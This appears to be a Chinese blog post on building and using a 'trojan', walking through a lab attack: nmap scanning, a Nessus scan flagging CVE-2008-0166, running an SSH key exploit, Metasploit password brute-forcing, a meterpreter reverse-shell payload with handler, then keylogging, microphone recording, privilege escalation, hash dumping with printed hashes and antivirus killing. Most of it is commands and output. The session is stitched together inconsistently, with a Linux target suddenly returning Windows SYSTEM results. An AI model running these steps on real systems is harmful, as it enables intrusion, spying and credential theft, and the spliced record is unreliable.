此文章是vip文章,如何查看?  

1,点击链接获取密钥 http://nicethemes.cn/product/view29882.html

2,在下方输入文章查看密钥即可立即查看当前vip文章


生成木马病毒

  • 时间:
  • 浏览:
  • 来源:互联网

一信息收集:

 

 

1根据条件生成密码字典:

 

选择条件的字符

 

 

生成对应的字典

 

 

 

对对应的网段进行主机存活扫描:

nmap -sP 192.168.183.0/24 

分析那个网段是靶子计算机由于本网段的ip为183.129

且网管和服务器占据了183.1和183.2和183.254

剩下的2个ip,由于开了两个网卡,再次我们不妨定下靶子计算机的IP为183.132或则183.133

 

 

尝试是否可以通讯:结果可以

 

查看183.132开启了哪些端口和哪些服务

 

此处如果存在以下服务漏洞我们就可以对他进行攻击我们就可以对其进行攻击。

21/tcp   open  ftp

22/tcp   open  ssh

23/tcp   open  telnet

80/tcp   open  http

3306/tcp open  mysql

5432/tcp open  postgresql

8009/tcp open  ajp13

8180/tcp open  unknown

 

2使用nessus软件对192.168.183.132进行漏洞的扫描:

 

填写相关的信息

 

开始扫描:

 

 

分析结果:

 

Description

The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.

 

The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.

 

An attacker can easily obtain the private part of the remote key and use this to set up decipher the remote session or set up a man in the middle attack.

Solution

Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.

 

此处存在2个高危漏洞,此处我们以ssh为例进行渗透

 

找出漏洞编号为:CVE-2008-0166

 

3渗透攻击:

 

由于CVE-2008-0166不可以直接在bt5上直接用所以就必须去下载相应文件

oot@bt:~# /pentest/exploits/exploitdb/platforms/linux/remote/ openssl

bash: /pentest/exploits/exploitdb/platforms/linux/remote/: is a directory

root@bt:~# cd /pentest/exploits/exploitdb/platforms/linux/remote/

root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132

 

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org

./exploit.py <dir> <host> <user> [[port] [threads]]

    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash

    <host>: The victim host

    <user>: The user of the victim host

    [port]: The SSH port of the victim host (default 22)

    [threads]: Number of threads (default 4) Too big numer is bad

root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132 root

 

 

 

用msf辅助模块对192.168.183.132进行口令破解:

查找ssh的攻击模块

msf > search ssh

msf > use  auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104

RHOSTS => 192.168.1.104

msf auxiliary(ssh_login) > set USERNAME root

USERNAME => root

msf auxiliary(ssh_login) > set PASS_FILE pass.txt

PASS_FILE => pass.txt

msf auxiliary(ssh_login) > set THREADS 50

THREADS => 50

msf auxiliary(ssh_login) > run

 

分析结果:

 

最终找到了一个用户名:root密码:ubuntu的账号可以登录进去。

使用xshell5进行登录测试:

通过

 

植入木马:

 

 

 

制作木马生成木马客服端;

 

msfpayload linux/x86/meterpreter/reverse_tcp  lhost=192.168.183.132 lport=5555 x>test6

通过xshell上传木马到192.168.183.132靶子计算机上,执行:

 

root@metasploitable:~# ./test6

 

配置木马服务器端

 

msf  exploit(handler) > set LHOST 192.168.183.129

LHOST => 192.168.183.129

msf  exploit(handler) > set LPORT 5555

LPORT => 5555

msf  exploit(handler) > exploit

 

[*] Started reverse handler on 192.168.183.129:5555

[*] Starting the payload handler...

 

利用木马进行渗透

 

meterpreter >

 

 

eterpreter > keyscan_start

Starting the keystroke sniffer...

meterpreter > keyscan_dump

Dumping captured keystrokes...

 

meterpreter > keyscan_dump

Dumping captured keystrokes...

meterpreter >

 

meterpreter > keyscan_stop

Stopping the keystroke sniffer...

 

J

截取声音

meterpreter > record_mic -d 10 (录制10S)

meterpreter > shell 进入对方的SHELL

 

下载图片

meterpreter > migrate 1632

[*] Migrating to 1632...

[*] Migration completed successfully.

meterpreter >

 

eterpreter > download calc.exe

[*] downloading: calc.exe -> calc.exe

[*] downloaded : calc.exe -> calc.exe

 

 

 

meterpreter > getpid

Current pid: 1024

 

eterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > getprivs

============================================================

Enabled Process Privileges

============================================================

  SeDebugPrivilege

  SeTcbPrivilege

  SeAssignPrimaryTokenPrivilege

  SeLockMemoryPrivilege

  SeIncreaseQuotaPrivilege

  SeSecurityPrivilege

  SeTakeOwnershipPrivilege

 

meterpreter > getprivs

============================================================

Enabled Process Privileges

============================================================

  SeDebugPrivilege

  SeTcbPrivilege

  SeAssignPrimaryTokenPrivilege

 

meterpreter > getsystem

...got system (via technique 1).

meterpreter > hashdump

Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::

ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::

dg:1009:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

IUSR_ROOT-TVI862UBEH?:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::

IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::

SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:ac4f5c3f7b7a2bde31f8de9ce3fd1657:::

 

meterpreter > run post/windows/gather/checkvm

 

[*] Checking if ROOT-TVI862UBEH is a Virtual Machine .....

[*] This is a VMware Virtual Machine

meterpreter > run get_application_list

 

Installed Applications

======================

 

 Name                                Version

 ----                                -------

 Windows Installer 3.1 (KB893803)    3.1

 WinRAR 4.01 (32-bit)                4.01.0

 Oracle Data Provider for .NET Help  10.2.000

 Kingview Driver                     6.53

 Kingview 6.53                       6.53

 

meterpreter > run getcountermeasure

[*] Running Getcountermeasure on the target...

[*] Checking for contermeasures...

[*] Getting Windows Built in Firewall configuration...

[*]   The following command was not found: firewall show opmode.

[*] Checking DEP Support Policy...

meterpreter > run killav

[*] Killing Antivirus services on the target...

[*] Killing off cmd.exe...

 

信道:

 

meterpreter > run killav

[*] Killing Antivirus services on the target...

[*] Killing off cmd.exe...

meterpreter >  execute -f cmd.exe -c

Process 2212 created.

Channel 4 created.

meterpreter > channel -w 9

 

meterpreter > channel -l

 

    Id  Class  Type

    --  -----  ----

    2   3      stdapi_process

    3   3      stdapi_process

    4   3      stdapi_process

 

meterpreter > channel -w 2

Enter data followed by a '.' on an empty line:

 

 

^C[-] Error running command channel: Interrupt

meterpreter > channel -w 9

[-] Invalid channel identifier specified.

meterpreter > channel -w 3

 

meterpreter > interact 2

Interacting with channel 2...

 

 

本文链接http://element-ui.cn/news/show-576935.aspx